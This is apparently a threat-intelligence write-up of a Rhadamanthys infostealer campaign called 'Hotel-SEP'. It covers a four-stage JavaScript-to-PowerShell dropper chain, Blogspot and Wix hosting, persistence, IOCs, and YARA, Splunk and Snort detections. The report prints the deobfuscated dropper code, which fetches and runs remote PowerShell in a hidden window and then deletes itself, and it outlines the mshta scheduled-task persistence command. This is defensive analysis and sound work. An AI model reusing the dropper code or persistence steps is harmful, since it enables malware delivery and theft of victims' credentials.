Rhadamanthys Stealer's "Hotel-SEP" Campaign: Four-Stage JS Dropper With Live Blogspot Infrastructure, Fraudulent Sectigo Certificate, and Zero ThreatFox Coverage
TL;DR: A four-stage Rhadamanthys infostealer dropper chain -- starting from a 95KB JavaScript file with a fake Authenticode signature -- abuses Google Blogspot and Wix for payload hosting, deploys dual persistence via Scheduled Tasks and Registry Run keys, and ultimately loads the stealer DLL entirely in memory through .NET reflection. All payload infrastructure is live as of 2026-03-09, and none of the extracted IOCs appear in ThreatFox. The campaign operator, internally calling this "Hotel-SEP," made several OPSEC failures including exposing the campaign name in Blogspot page titles and leaving Hindi/Urdu language artifacts in obfuscated variable names.
The Attack Chain
The infection begins with a 97KB JavaScript file carrying a fake Authenticode signature -- 258 lines of base64-encoded certificate data designed to make the file appear legitimately signed. When the victim double-clicks this .js file, Windows Script Host executes it, kicking off a chain that never touches disk with a detectable binary.
STAGE 1: JavaScript Dropper (wscript.exe)
| Decodes 5 strings through 44 eval() calls and 693 XOR operations
| Shell.Application -> ShellExecute("powershell", ..., "open", 0)
| Self-deletes via Scripting.FileSystemObject
v
STAGE 2: PowerShell Script (7.7KB, downloaded from Blogspot #1 via Wix)
| Kills mshta/wscript/msbuild processes
| Decodes decimal-encoded command (lund->0 substitution cipher)
| Creates Scheduled Task (mshta + javascript: protocol handler)
| Creates Registry Run key for persistence
v
STAGE 3: PowerShell Binary Loader (5.5MB, downloaded from Blogspot #2 via Wix)
| Kills .NET Framework processes, cleans .bat/.ps1/.lnk/.cmd/.vbs files
| Decodes two embedded binaries (decimal encoding with character substitution + reversal)
| Loads .NET assembly via [Reflection.Assembly]::Load()
v
STAGE 4: .NET Assembly Injector -> Rhadamanthys Stealer (in-memory)
| Injects into regsvcs.exe or other .NET Framework process
| Loads embedded native DLL ("2.4.dll") via LoadLibraryA
v
DATA EXFILTRATION: Browser credentials, cookies, crypto wallets
Every stage self-deletes. Every stage kills processes from prior stages. The operator cleans up after themselves at each step, removing .bat, .ps1, .lnk, .cmd, and .vbs files from %APPDATA%, %PUBLIC%, the Startup folder, and %ProgramData%. By the time Rhadamanthys is running in memory inside regsvcs.exe, the only artifacts left are a scheduled task and a registry key.
Stage 1: Five Layers of JavaScript Obfuscation
The dropper is one of the more heavily obfuscated JavaScript files we have analyzed recently. Five distinct layers protect a payload that ultimately amounts to two lines of functional code.
Layer 1 -- Fake Authenticode Signature. The file opens with // SIG // blocks containing base64-encoded certificate data. This serves dual purpose: it makes the file appear signed to casual inspection, and it inflates the file size past simple sandbox heuristics.
Layer 2 -- String Array with Rotation. An obfuscator.io pattern using a 14-element array of key strings, shuffled by a rotation function with integrity checks.
Layer 3 -- Variable Name Obfuscation. All meaningful identifiers replaced with a single 651-character random string starting with _fUiyAYxwmDwMLJYzCcg....
Layer 4 -- Nested XOR String.fromCharCode. Five critical strings are constructed character-by-character through nested eval chains. Each character requires an inner eval(String.fromCharCode(xor_pairs)) that produces a digit string, JavaScript's eval() converting it to a number, and an outer String.fromCharCode() producing the final character. 693 XOR operations across 44 eval blocks.
Layer 5 -- 44 eval() Calls. Each resolving one character. No meaningful string appears in plaintext anywhere in the file.
After full deobfuscation, the decoded execution logic is straightforward:
var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("powershell",
"-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = " +
"[Net.SecurityProtocolType]::Tls12; Invoke-Expression (IrM " +
"https://potalgonabunbunsed.blogspot.com///////////i.pdf); " +
"Start-Sleep -Seconds 9",
"", "open", 0); // 0 = SW_HIDE (hidden window)
var fso = new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFile(WScript.ScriptFullName); // Self-delete
The excessive forward slashes in the Blogspot URL (///////////i.pdf) are a redirect trick -- Blogspot normalizes them, but the unusual path may bypass URL filtering rules that expect clean paths.
Infrastructure: Blogspot Redirects to Wix CDN
The operator built a two-tier hosting architecture using entirely legitimate platforms. Google Blogspot serves as the initial URL (benefiting from Google's domain reputation), then redirects to Wix's usrfiles.com CDN (served via Amazon CloudFront) for actual file delivery.
| Component | URL/Domain | Hosting | Status |
|---|---|---|---|
| Blogspot #1 (Stage 2) | potalgonabunbunsed[.]blogspot[.]com | Google Blogger (142.251.16.132) | LIVE |
| Blogspot #2 (Stage 3) | hotelsep[.]blogspot[.]com | Google Blogger | LIVE |
| Wix File Host #1 | 94fae730-597f-4442-813c-86263972a8f0[.]usrfiles[.]com | Amazon CloudFront (108.138.106.x) | LIVE |
| Wix File Host #2 | 09c1d5c3-1a6e-4c05-8e4e-eff75c6b5dd6[.]usrfiles[.]com | Amazon CloudFront (108.138.106.x) | LIVE |
The redirect chain for Stage 2 follows this path:
https://potalgonabunbunsed.blogspot.com///////////i.pdf
-> 302 -> https://potalgonabunbunsed.blogspot.com/i.pdf
-> 302 -> https://94fae730-...-86263972a8f0.usrfiles.com/ugd/94fae7_2c7a859032924ae0aa0e819669ae9f3f.txt
-> 200 (PowerShell Stage 2, 7.7KB)
Stage 3 follows a similar pattern through hotelsep.blogspot.com, arriving at the second Wix site to download the 5.5MB binary loader.
The "Hotel-SEP" Campaign Name
Both Blogspot accounts expose the operator's internal campaign name in their page titles:
| Blog | Blogger ID | Title | Last Updated |
|---|---|---|---|
| potalgonabunbunsed.blogspot.com | 9241098311851451 | ###Hotel-SEP-MAIN### | 2025-09-28 |
| hotelsep.blogspot.com | 5952690725098598649 | ####HOTEL SEP#### | 2026-02-27 |
The first blog uses a randomized name ("potalgonabunbunsed"), but the second blog directly uses the campaign name as its URL -- an OPSEC failure that links the two accounts and provides a pivot point for hunting additional infrastructure.
Stage 2: Polymorphic PowerShell with Substitution Cipher
The Stage 2 PowerShell payload uses a decimal-encoded command string with a substitution cipher: * is replaced with , (comma separator) and the string lund replaces the digit 0. A Caesar cipher with shift=3 is applied to the ExecutionPolicy bypass string. Random 3-letter variable names are injected for polymorphism, meaning each download produces a slightly different script.
Key actions performed by Stage 2:
- Sets ExecutionPolicy to Unrestricted
- Kills competing processes:
mshta.exe,wscript.exe,msbuild.exe - Creates a Scheduled Task with a randomized 60-165 minute interval and 10-year duration (3,650 days)
- Creates a Registry Run key at
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\maincrp<random_num> - The scheduled task executes
mshta.exewith inline JavaScript that downloads Stage 3 fromhotelsep.blogspot.com
The lund substitution is operationally interesting -- it is a Hindi/Urdu word, one of several South Asian language artifacts scattered through the codebase.
Stage 3: In-Memory Binary Deployment
The 5.5MB Stage 3 script contains two embedded binaries encoded with decimal values, character substitution, and string reversal:
- The .NET assembly loader (
$lora):Lbecomes,and&becomes0, then the entire string is reversed - The Rhadamanthys DLL (
$PE):}becomes,and{becomes0, then reversed
Both are decoded via a Convert-DecimalTxtToExe function, then loaded entirely in memory through [Reflection.Assembly]::Load() -- no file is ever written to disk. If the loaded assembly has an EntryPoint, it is invoked directly. If it is a DLL (no EntryPoint), the loader finds the first public static method and passes the Rhadamanthys DLL bytes as an argument.
Before any of this happens, Stage 3 kills all processes running from .NET Framework directories and cleans malware artifacts from common persistence locations. The operator is methodical about eliminating forensic evidence.
Stage 4: The .NET Injector and Rhadamanthys DLL
The Injector (5357.exe)
| Property | Value |
|---|---|
| Type | PE32 .NET Assembly (EXE) |
| Original Name | 5357.exe |
| Framework | .NET 4.0 (v4.0.30319) |
| Language | Visual Basic .NET |
| Size | 600,744 bytes |
| SHA-256 | 6fbca49b2af016d5a6df14164fbcc4830b8acf8b5f85f0c1a8da47b21d54191d |
String analysis of the injector reveals extensive capabilities beyond simple injection:
- Keylogging:
GetKeyState,GetKeyboardLayout,GetKeyboardState,MapVirtualKey - Webcam capture:
capCreateCaptureWindowA(avicap32.dll) - Windows hook installation:
SetWindowsHookEx - Process enumeration:
GetProcesses,GetProcessById - Encryption:
CreateDecryptor,CreateEncryptor,ICryptoTransform - Network communication:
DownloadFile,HttpWebRequest - Registry manipulation:
Registry,CreateSubKey,DeleteSubKey - SOAP-based C2:
SoapHttpClientProtocol - Screen capture:
SetProcessDpiAwareness
The Rhadamanthys DLL
| Property | Value |
|---|---|
| Type | PE32 .NET DLL |
| Size | 1,075,056 bytes |
| Embedded DLL | 2.4.dll (native code) |
| Entropy | 7.75 |
| SHA-256 | c5f36ddfffe081a138fcf592b17238c28f977e531749d2d31d23c066e73f7b81 |
The Rhadamanthys DLL is a .NET wrapper that extracts an embedded native DLL ("2.4.dll") from its resources and loads it dynamically via LoadLibraryA and GetDelegateForFunctionPointer. The actual stealer logic resides in the native code. The high entropy (7.75) indicates the resource data is encrypted or compressed. The "2.4.dll" naming matches known Rhadamanthys versioning conventions, consistent with v0.5.x distribution tooling.
Persistence: Dual Mechanism With 10-Year Duration
The campaign deploys two complementary persistence mechanisms:
1. Scheduled Task:
Name: "maincrp<random_60-165>"
Action: mshta.exe "javascript:var def=[...]; new ActiveXObject('Shell.Application')
.ShellExecute('powershell', ...); close();"
Trigger: Every 60-165 minutes (randomized), starting at system date
Duration: 10 YEARS (3650 days)
Random Delay: 30 minutes
2. Registry Run Key:
Path: HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Name: "maincrp<random_60-165>"
Value: schtasks /run /tn <task_name>
The persistence is highly resilient. Even if the stealer process is killed, the scheduled task re-executes every 1-3 hours. The Run key ensures execution on every logon. Both mechanisms point back to the live Blogspot infrastructure, which means the operator can update the final payload at any time simply by changing the files hosted on Wix -- no need to re-infect the victim.
Fraudulent Code Signing Certificates
Two certificates were identified in the dropper's fake Authenticode signature chain.
Sectigo Certificate (Primary -- FRAUDULENT)
Subject: Qlc Ybsqlejkh Zoii Lttcg Hssazjdlm
Country: CA (Canada)
Province: Bfcglcr (gibberish -- likely obfuscated "British Columbia")
Issuer: Sectigo Public Code Signing CA R36
Root CA: Comodo CA Limited / Sectigo
Valid: 2022-03-03 to 2023-03-03 (EXPIRED)
The entity name "Qlc Ybsqlejkh Zoii Lttcg Hssazjdlm" is clearly generated gibberish, not a real organization. The certificate was likely purchased from Sectigo using fabricated Canadian identity documents.
SSL.com EV Certificate (Embedded in Chain)
Subject: Enviaolo LLC
Issuer: SSL.com EV Code Signing Intermediate CA RSA R3
Valid: 2024-04-23 to 2026-04-23
Type: Extended Validation Code Signing
The "Enviaolo LLC" certificate requires further investigation -- it could be a legitimate company whose certificate was compromised, or another shell entity. Additional intermediary entities in the chain ("Bfalpjrarmsjh Uvem" and "Ykjgkiusrvel Grzn Rojbsu") are also gibberish, suggesting systemic certificate fraud rather than an isolated incident.
Threat Actor Profile
Attribution confidence: LOW-MEDIUM
Several indicators point to a South/Southeast Asian operator:
- Hindi/Urdu language artifacts in variable names:
lund(Hindi/Urdu word used as substitution for0),lorykabal,lundkhini,Binackwkonce - "Hotel-SEP" campaign name exposed in Blogspot page titles -- both blogs use this identifier
- OPSEC failures: using the campaign name directly as a blog URL (
hotelsep.blogspot.com), linking both Blogger accounts - English-as-second-language indicators: code comment
#sheduler(misspelling of "scheduler") - Gibberish certificate entities that are clearly not real companies
- Consistent Wix hosting pattern across both stages -- a fingerprint for hunting related campaigns
The operator demonstrates medium sophistication. The five-layer JavaScript obfuscation, abuse of legitimate hosting platforms, and fileless final-stage execution are competent tradecraft. But the OPSEC failures -- campaign name exposure, language artifacts, consistent infrastructure patterns -- provide ample pivots for threat hunting.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | JS file delivered (likely via email) |
| Execution | User Execution: Malicious File | T1204.002 | Victim double-clicks .js file |
| Execution | Command and Scripting Interpreter: JavaScript | T1059.007 | WSH executes obfuscated JS |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Multiple PowerShell stages |
| Execution | Inter-Process Communication: COM | T1559.001 | Shell.Application, ActiveXObject |
| Execution | Native API | T1106 | LoadLibraryA, GetDelegateForFunctionPointer |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | 60-165min recurring task, 10-year duration |
| Persistence | Boot or Logon Autostart: Registry Run Keys | T1547.001 | HKCU Run key |
| Defense Evasion | Obfuscated Files or Information | T1027 | 5-layer JS obfuscation, Caesar cipher, decimal encoding |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | Multiple decoding stages with substitution ciphers |
| Defense Evasion | Masquerading | T1036.005 | Fake Authenticode signature |
| Defense Evasion | Signed Binary Proxy Execution: Mshta | T1218.005 | mshta.exe with javascript: protocol |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Self-deletion at every stage |
| Defense Evasion | Process Injection | T1055 | Reflection.Assembly.Load() into regsvcs.exe |
| Defense Evasion | Code Signing | T1553.002 | Fraudulent Sectigo + SSL.com certificates |
| Discovery | Process Discovery | T1057 | Process enumeration via GetProcesses |
| Collection | Input Capture: Keylogging | T1056.001 | GetKeyState, SetWindowsHookEx |
| Collection | Video Capture | T1125 | avicap32.dll webcam capture |
| Collection | Screen Capture | T1113 | SetProcessDpiAwareness |
| Command and Control | Web Service | T1102 | Blogspot + Wix CDN for payload delivery |
| Command and Control | Encrypted Channel | T1573 | TLS 1.2 enforced for downloads |
| Command and Control | Ingress Tool Transfer | T1105 | Multi-stage payload download |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Stolen data via HTTP/SOAP |
Indicators of Compromise
File Hashes (SHA-256)
31030324a813c318daf7b73cbbb2797942249198baf0f08cd5f96ccd8f551e07 (Stage 1 - JS dropper, 97,514 bytes)
55c48e39f46c9f800c1ee10d865d0877997e5d9959ce97c94c43257dc7d0efe1 (Stage 2 - PowerShell, 7,756 bytes)
4deae7dfac227aa2d5c350bcb2cc45a920cf5ed3270c3ee83c1818f6761476ef (Stage 3 - PowerShell binary loader, 5,581,141 bytes)
6fbca49b2af016d5a6df14164fbcc4830b8acf8b5f85f0c1a8da47b21d54191d (Stage 4a - .NET injector, 600,744 bytes)
c5f36ddfffe081a138fcf592b17238c28f977e531749d2d31d23c066e73f7b81 (Stage 4b - Rhadamanthys DLL, 1,075,056 bytes)
Network Indicators
hxxps://potalgonabunbunsed[.]blogspot[.]com///////////i.pdf
hxxps://hotelsep[.]blogspot[.]com/puddi.pdf
hxxps://94fae730-597f-4442-813c-86263972a8f0[.]usrfiles[.]com/ugd/94fae7_2c7a859032924ae0aa0e819669ae9f3f.txt
hxxps://09c1d5c3-1a6e-4c05-8e4e-eff75c6b5dd6[.]usrfiles[.]com/ugd/09c1d5_d914829d1aaa40c0be0eb5be2949c691.txt
CloudFront IPs (Wix CDN)
108.138.106.125
108.138.106.122
108.138.106.21
108.138.106.35
Blogger IDs
9241098311851451 (potalgonabunbunsed)
5952690725098598649 (hotelsep)
Wix Site UUIDs
94fae730-597f-4442-813c-86263972a8f0
09c1d5c3-1a6e-4c05-8e4e-eff75c6b5dd6
Certificate Indicators
Sectigo (fraudulent): Subject=Qlc Ybsqlejkh Zoii Lttcg Hssazjdlm, C=CA, Issuer=Sectigo Public Code Signing CA R36
SSL.com EV: Subject=Enviaolo LLC, Issuer=SSL.com EV Code Signing Intermediate CA RSA R3
Behavioral Indicators
Scheduled Task: maincrp<60-165> (mshta.exe with javascript: argument)
Registry Key: HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\maincrp<60-165>
Injection Target: regsvcs.exe
Processes Killed: mshta.exe, wscript.exe, msbuild.exe, jsc.exe, addInProcess.exe,
AddInProcess32.exe, aspnet_compiler.exe, *.bat.exe
Files Cleaned: *.bat, *.ps1, *.lnk, *.cmd, *.vbs in %APPDATA%, %PUBLIC%, Startup, %ProgramData%
Detection Opportunities
YARA Rules
rule Rhadamanthys_HotelSEP_JS_Dropper {
meta:
description = "Detects Hotel-SEP campaign JS dropper with fake Authenticode and XOR eval chains"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "HIGH"
reference = "https://intel.breakglass.tech"
strings:
$sig_block = "// SIG //" ascii
$eval_chain = "eval(String.fromCharCode(" ascii
$shell_app = { 53 68 65 6C 6C 2E 41 70 70 6C 69 63 61 74 69 6F 6E } // Shell.Application
$wsh_delete = "WScript.ScriptFullName" ascii
$blogspot = "blogspot.com" ascii
$obf_var = "_fUiyAYxwmDwMLJYzCcg" ascii
condition:
filesize < 200KB and
$sig_block and
#eval_chain > 10 and
2 of ($shell_app, $wsh_delete, $blogspot, $obf_var)
}
rule Rhadamanthys_HotelSEP_PS_Stage2 {
meta:
description = "Detects Hotel-SEP PowerShell Stage 2 with lund substitution cipher"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "HIGH"
strings:
$lund_sub = "lund" ascii nocase
$schtasks = "schtasks" ascii nocase
$maincrp = "maincrp" ascii nocase
$mshta = "mshta" ascii nocase
$javascript_proto = "javascript:" ascii nocase
$hotelsep = "hotelsep" ascii nocase
condition:
3 of them
}
rule Rhadamanthys_HotelSEP_PS_Stage3_Loader {
meta:
description = "Detects Hotel-SEP PowerShell Stage 3 with dual binary encoding"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "CRITICAL"
strings:
$reflection = "[Reflection.Assembly]::Load" ascii
$convert_func = "Convert-DecimalTxtToExe" ascii
$lora_var = "$lora" ascii
$pe_var = "$PE" ascii
$payload_bytes = "$payloadBytes" ascii
$net_framework = "Microsoft.NET\\Framework" ascii wide
condition:
filesize > 1MB and
$reflection and
3 of them
}
Hunting Queries
Scheduled task pattern (Splunk/Elastic):
index=sysmon EventCode=1
| where process_name="schtasks.exe" AND
(command_line LIKE "%maincrp%" OR
(command_line LIKE "%mshta%" AND command_line LIKE "%javascript:%"))
Registry Run key persistence (Sysmon EventCode 13):
index=sysmon EventCode=13
| where registry_path LIKE "%\\CurrentVersion\\Run\\maincrp%"
Mshta.exe with javascript: protocol (high-fidelity):
index=sysmon EventCode=1
| where process_name="mshta.exe" AND command_line LIKE "%javascript:%"
| where parent_process_name IN ("svchost.exe", "taskeng.exe", "taskhostw.exe")
Blogspot payload download (proxy/firewall logs):
index=proxy
| where url LIKE "%blogspot.com%"
AND (url LIKE "%.pdf" OR url LIKE "%.txt")
AND http_method="GET"
AND bytes_out > 5000
| stats count by src_ip, url, dest_ip
Regsvcs.exe with unexpected parent (injection detection):
index=sysmon EventCode=1
| where process_name="regsvcs.exe"
AND parent_process_name NOT IN ("services.exe", "svchost.exe", "mmc.exe")
| table _time, host, parent_process_name, command_line
Snort/Suricata Rules
# Hotel-SEP -- Blogspot payload redirect with excessive slashes
alert http any any -> any any (msg:"RHADAMANTHYS Hotel-SEP Blogspot Payload Download"; \
content:"blogspot.com"; http_host; content:"///"; http_uri; \
sid:2026030901; rev:1;)
# Hotel-SEP -- Wix CDN payload delivery (usrfiles.com)
alert http any any -> any any (msg:"RHADAMANTHYS Hotel-SEP Wix Payload Delivery"; \
content:"usrfiles.com"; http_host; content:"/ugd/"; http_uri; \
sid:2026030902; rev:1;)
# Hotel-SEP -- mshta.exe javascript: protocol execution
alert any any any -> any any (msg:"RHADAMANTHYS Hotel-SEP Mshta Javascript Protocol"; \
content:"mshta"; content:"javascript|3A|"; within:50; \
sid:2026030903; rev:1;)
Published by Breakglass Intelligence. Investigation conducted 2026-03-09. Four-stage infection chain fully deobfuscated. All infrastructure live. Zero ThreatFox coverage. Classification: TLP:CLEAR